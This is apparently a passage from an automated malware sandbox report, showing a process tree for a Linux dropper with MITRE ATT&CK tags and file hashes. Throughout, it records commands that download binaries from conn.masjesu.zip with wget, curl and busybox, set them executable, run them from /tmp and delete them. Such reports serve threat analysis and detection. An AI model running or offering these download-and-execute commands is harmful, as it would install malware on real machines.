-
/tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz./viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE./WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3./thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵PID:966
-
-
/bin/chmodchmod 777 bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA./bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵PID:973
-
-
/bin/chmodchmod 777 CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq./CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT./tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a./abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵PID:994
-
-
/bin/chmodchmod 777 mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e./mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux./MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- System Network Configuration Discovery
PID:1005
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- System Network Configuration Discovery
PID:1008
-
-
/bin/chmodchmod 777 xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC./xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- Executes dropped EXE
PID:1010
-
-
/bin/rmrm xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵PID:1011
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97